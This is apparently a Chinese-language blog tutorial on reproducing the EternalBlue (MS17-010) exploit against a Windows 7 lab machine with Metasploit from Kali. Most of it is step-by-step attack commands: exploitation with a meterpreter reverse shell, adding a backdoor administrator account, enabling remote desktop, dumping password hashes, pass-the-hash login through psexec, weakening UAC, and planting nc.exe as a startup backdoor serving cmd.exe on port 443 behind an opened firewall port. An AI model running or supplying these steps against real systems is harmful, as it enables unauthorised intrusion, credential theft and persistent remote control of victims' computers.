[top]
1. 什么是永恒之蓝
简单理解,就是恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
勒索病毒.jpeg
蓝的来源.png
2. 使用MSF复现永恒之蓝,拿到shell
2.1本文整体思路
整体流程.png2.2 包含内容
入侵流程
入侵后的远程桌面登录
入侵后的账号密码登录后台运行
入侵后的自启动木马植入,链接木马控制目标
3. 开干
目标:win7
ip:192.168.1.21
445端口开放
攻击机:kali
ip:192.168.1.22
命令总结:
拿下目标流程命令
msfdb run
启动
use auxiliary/scanner/smb/smb_ms17_010
使用扫描
set RHOSTS 192.168.1.21
设置目标
run
扫描
use exploit/windows/smb/ms17_010_eternalblue
使用攻击
set payload windows/x64/meterpreter/reverse_tcp
设置负载
set RHOSTS 192.168.1.21
设置目标
run
攻击
shell
进入目标cmd中远程桌面登录
getuid
查看权限
shell
进入目标cmd
chcp 65001
更改编码规则
net user hack 123123
创建新用户
net localgroup administrators hack /add
添加用户权限
exit
退出cmd
run post/windows/manage/enable_rdp NAEM=hack PASSWORD=123123
启动远程登录功能
rdesktop 192.168.1.21
kali新开rdp链接使用哈希值登录目标
hashdump
获取hash密码
background
后台运行
use exploit/windows/smb/psexec
使用攻击模块
set payload windows/meterpreter/reverse_tcp
设置负载
show options
查看设置项
set rhosts 192.168.1.21
设置目标ip
set smbpass aad3b435b51404eeaad......
设置哈希密码
set smbuser Administrator
设置用户
set lhost 192.168.1.22
本地ip
run
植入开机自启动木马,远程登录
shell
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
开启UAC
exit
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
nc后门程序放在目标上
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
设置后门开机自启动
netsh firewall add portopening TCP 443 "hack443" ENABLE ALL
cmd开启后门链接的443端口
shutdown -r -f -t 0
重启目标,UAC、木马生效
nc -v 192.168.1.21 443
NC链接
connect 192.168.1.21 443
msf链接
3.1 启动kali的msf扫描ms17_010漏洞
1. 开启MSF:msfdb run 或 msfconsole
启动成功.png
2. 搜索ms17_010相关内容
永恒之蓝相关模块.png
3. 使用扫描模块扫描目标是否可被攻击
- 使用模块
use 3 //前面的扫描结果序号
或者
use auxiliary/scanner/smb/smb_ms17_010
- 查看需要设置内容
show options
set RHOSTS 192.168.1.21
需要设置的内容.png
- Required 选项是yes的是必填选项
RHOSTS 目标的ip地址
设置目标ip.png
- 开始扫描
run
或exploit
存在漏洞.png
4. 使用攻击模块(搜索处可查)
- 使用exp攻击模块
use exploit/windows/smb/ms17_010_eternalblue
使用永恒之蓝攻击模块.png
- 之前版本中需要单独set payload,现在版本默认设置了payload
- 设置payload
set payload
、设置目标ip
设置payload.png
- payload中默认的本地的ip所有不用再设置了
5. 开始执行攻击
攻击成功.png
run
或exploit
成功拿下这台机器!
这里已经得到了这台机器的控制权,接下来是属于其他操作
3.2 开启对目标的控制
1. 远程桌面登录(目标会感知)
前期准备
前期准备.png- 启动后渗透
run post/windows/manage/enable_rdp USERNAME=test PASSWORD=aabbcc
开启后渗透,可远程桌面连接.png- kali远程登录
rdesktop 192.168.1.21
启动远程桌面登录.png
登录页面.png- 正常情况下是可以直接登录了
- 如果输入账号密码后提示权限不足则执行
net localgroup administrators new /add
提升管理员权限.png
再桌面登录
登录成功
远程登录成功.png
2. 哈希值后台登录(后台运行,目标无感知)
- 先获取哈希值
hashdump
并后台运行background
[注意哈希是是红线标注部分,:*****::: 的 ***** 部分]
得到哈希值.png- 设置攻击模块和负载模块,并且查看需要设置的内容
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
show options
image.png- 设置相关内容
set rhosts 192.168.1.21
设置目标ip
set smbpass aad3b435b51404eeaad......
设置哈希密码
set smbuser Administrator
设置用户
set lhost 192.168.1.22
本地ip
设置攻击模块参数.png- 开始攻击
run
攻击成功.png此时就是哈希密码登录目标
3. 植入自启动后门程序,实现后台运行
- 进入cmd 开启UAC,返回meterpreter
shell
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
exit
开启UAC.png- 将nc后门程序放在目标上
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
上传nc后门.png- 设置后门开机自启动,cmd开启后门链接的443端口
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
设置木马程序.png
netsh firewall add portopening TCP 443 "hack443" ENABLE ALL
* 此时需要重启目标主机,重启后只要目标登录上了主机就可用nc或者msf远程直接链接,不需要exp
- 目标重启后登录,分别使用NC和msf链接目标
nc -v 192.168.1.21 443
NC链接
connect 192.168.1.21 443
msf链接
nc链接目标.png
msf链接目标.png
网友评论